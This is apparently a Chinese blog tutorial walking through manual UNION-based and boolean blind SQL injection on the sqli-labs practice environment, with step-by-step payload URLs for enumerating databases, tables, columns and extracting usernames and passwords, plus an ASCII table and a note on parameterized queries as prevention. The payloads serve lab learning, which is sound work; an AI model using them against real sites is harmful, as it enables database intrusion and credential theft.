当前位置：首页 > article >正文

联合注入及布尔型盲注基础流程（手注sqli-labs-master）

article 2026/4/8 21:35:24

SQL 注入的核心原理一句话概括攻击者通过在输入框或 URL 参数中输入恶意的 SQL 代码让数据库“误以为”这是正常的指令并执行从而泄露数据。联合注入(UNION-based Injection)联合注入是 SQL 注入中最常见、也最容易理解的一种攻击方式。它的核心武器是 SQL 中的 UNION 操作符。UNION 的作用UNION 的作用是把两个 SELECT 查询的结果集合并在一起。第一步判断注入点与闭合方式?id1 查看网页反馈存在注入第二步猜解列数 (ORDER BY)普通用途让结果集按某种顺序显示。注入用途ORDER BY 是探测“列数”的神器。只有先确定了列数你才能正确地使用 UNION SELECT 进行后续的攻击。测试?id1 ORDER BY 4 (页面不正常) -- - 说明没有4 列?id1 ORDER BY 3 (页面正常) -- - 说明至少3 列第三步脱库 (获取数据)目标利用确定的回显位把数据库里的敏感信息“换”出来。这是最后也是最爽的一步通常分为三个层级1.查库名把回显位的数字换成 database()2.查表名查询 information_schema.tables?id-1 UNION SELECT 1,2, group_concat(table_name) form information_schema.columns WHERE table_schemadatabase() --group_concat:“把查出来的几十张表名从‘多行’压缩成‘一行’用逗号隔开。3.查字段名?id-1 UNION SELECT 1,2 group_concat(column_name) from information_schema.columns WHERE table_nameusers --4.查具体数据查到字段比如 username, password后直接查询数据。?id-1 UNION SELECT 1,2group_concat(username,0x3a, password) FROM users --联合注入产生的三个必要条件1.代码层面的“不设防”字符串拼接后端代码在写SQL语句时偷懒直接把用户输入的参数“粘”进了查询语句里而不是使用安全的“参数化查询”预编译。2.攻击层面的“篡改”恶意输入因为代码没做过滤攻击者输入的不是普通的数字或文字而是SQL指令片段比如 UNION SELECT ...。当这些片段被拼接到原语句中时原本完整的SQL语句结构被破坏攻击者注入的“毒指令”成功闭合了引号成为了SQL语句的一部分。3.结果层面的“回显”数据合并这是联合注入区别于其他注入的关键。数据库执行了被篡改后的语句利用 UNION 操作符的特性把攻击者查询的结果比如密码表和原本查询的结果比如商品信息合并在一起并且直接显示在了网页上。预防参数化查询通过“代码与数据分离”剥夺了攻击者修改 SQL 逻辑布尔盲注和执行系统命令时间盲注的权力。在布尔盲注中它让攻击者的逻辑判断变成了死文本。在时间盲注中它让攻击者的延时函数变成了死字符。所以不管攻击者想玩什么花样联合、盲注、堆叠注入只要用了参数化查询所有的恶意输入都会被“关进盒子”里变成无害的数据这才是真正的“降维打击”。布尔型盲注特点看不见数据库内容但是可以通过提出逻辑真假问题来猜数据库的内容在实操布尔型盲注先要知道ascii码数字0-948-57字符ASCII 码 (十进制)048149250351452553654755856957大写字母 A - Z78-90字符ASCII 码 (十进制)字符ASCII 码 (十进制)A65N78B66O79C67P80D68Q81E69R82F70S83G71T84H72U85I73V86J74W87K75X88L76Y89M77Z90小写字母 a - z97-122小写和大写字母差了32字符ASCII 码 (十进制)字符ASCII 码 (十进制)a97n110b98o111c99p112d100q113e101r114f102s115g103t116h104u117i105v118j106w119k107x120l108y121m109z122第一阶段定真假确认漏洞?id1来测试页面真假发现显示了You are in...... (真)?id1通过闭合发现内容是空白假第二阶段爆库表 reconnaissance目标拿到数据库名、表名。核心工具LENGTH()测长度和 SUBSTR()猜字符。. 爆当前数据库名1.爆库1.猜长度?id1 AND LENGTH(DATABASE()) 10 --不断修改数字直到页面变“真”确定长度是 4。?id1 AND LENGTH(DATABASE()) 5 -- 这属于二分法区大概区间之后不断缩小范围区间一共是8个字符2.猜字符第一个字符115s第二个字符101e第三个字符是99c第四个字符是117u第五个字符是114r第六个字符是105i第七个字符是116t第八个字符是121y 拼接起来就是security2.猜列表1.先猜长度LIMIT 的格式是LIMIT [起始位置], [获取数量]前面的 0代表从第几行开始就像书的页码0 是第一页。后面的 1代表拿几行就像一次只读一页。http://127.0.0.1/sqli-labs-master/Less-8/?id1 and length((select table_name from information_schema.tables where table_schemadatabase() limit 3,1)) 5 --2.猜字母http://127.0.0.1/sqli-labs-master/Less-8/?id1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1),1,1)) 117 --117u115s101e114r115s 最后这个表名是users3.猜字段名1.猜长度http://127.0.0.1/sqli-labs-master/Less-8/?id1 and length ((select column_name from information_schema.columns where table_nameusers limit 3,1)) 4 --2.猜字段名http://127.0.0.1/sqli-labs-master/Less-8/?id1 and ascii (substr((select column_name from information_schema.columns where table_nameusers limit 3,1),1,1)) 117 --117之后的流程都是相仿的都是1.先确认长度2.在猜ascii字符4.猜解密码字段1.在开始猜密码之前先确定密码有多长比如 MD5 通常是 32 位。?id1 and length((select password from users limit 0,1)) 30 --2.猜解密码的具体内容逐字爆破?id1 and ascii(substr((select password from users limit 0,1),1,1)) 100 --参数详解select password from users我们要查的数据源。limit 0,1锁定第 1 个用户如果是第 2 个用户改成 1,1。substr(..., 1, 1)截取密码的第 1 个字符猜第 2 个字符就改成 ,2,1)。ascii(...) 100判断这个字符的 ASCII 码是否大于 100比如 f 是 102a 是 97。同时猜解用户名可选如果你想顺便把用户名也猜出来逻辑是一样的只是把 password 换成 username。猜第 1 个用户的用户名第 1 位?id1 and ascii(substr((select username from users limit 0,1),1,1)) 100 --

联合注入及布尔型盲注基础流程（手注sqli-labs-master）

相关文章：

联合注入及布尔型盲注基础流程（手注sqli-labs-master）

亚马逊，TEMU平台针对电动泵美国站的UL778标准

深入解析POODLE漏洞：SSL3.0的CBC模式安全隐患与防御策略

YOLO+SAM微调做工业缺陷分割：年省28万的实战案例

从体素到三维模型：解析Volumetric Method在复杂场景重建中的核心算法

AI 编程盛行的时代，为什么 “『DC- WFW』” 仍然具有必要性？了

YOLO+SAM工业缺陷检测：从理论到落地的完整方案

银河麒麟V10 SP1安全基线配置踩坑记：为什么pam_wheel.so的group=wheel参数不生效？

EnCase vs FTK vs 取证大师：三大取证工具实战横评与选型指南（2024版）

轴向磁通电机仿真避坑指南：ANSYS Maxwell 3D建模时气隙与对称性的7个关键设置

4重防护打造微信记录安全备份：开源工具实战指南

大模型幻觉问题：RAG检索增强与约束生成解决方案

第十三节：React Ink——用React驱动终端UI

90%嵌入式工程师必踩坑之volatile关键字，学会它轻松搞定面试官！！！

数据开发者的AI转型：大模型应用实录

避坑指南：ABB机器人PC SDK开发中，网络扫描(NetworkScanner)为何总为空？

从理论到代码：深入理解OpenCV中NMSBoxes的双重过滤机制

保姆级避坑指南：在只有一台能上网的服务器上，搞定Proxmox VE 7.0三节点集群和Ceph存储

算法岗正在分化：谁在做模型谁在做应用

“INMS: Memory Sharing for Large Language Model based Agents“ 论文笔记誓

C#的[DoesNotReturn]和[DoesNotReturnIf]：帮助流分析的特性

SDD基于规范编程-OpenSpec及SuperPowers沙

自编码器在图像处理中的5个隐藏用法：从降噪到异常检测

3步释放20GB空间：DriverStore Explorer的系统驱动优化方案

如何用Dify零代码打造专属AI知识管家：从资料整理到智能对话全指南

从零搭建一个RAG应用：我为什么最终放弃了ChromaDB而选择了Milvus？

用K230开发板给AI模型拍训练集照片？一个物理按键搞定（附Python源码）

Symfony 安全日志集成：TokenProcessor与SwitchUserTokenProcessor完全指南

Kubernetes集群的自动化运维实践

Ubuntu20.04下Intel RealSense设备开发环境搭建：从libRealsense SDK 2.0到ROS Wrapper全流程指南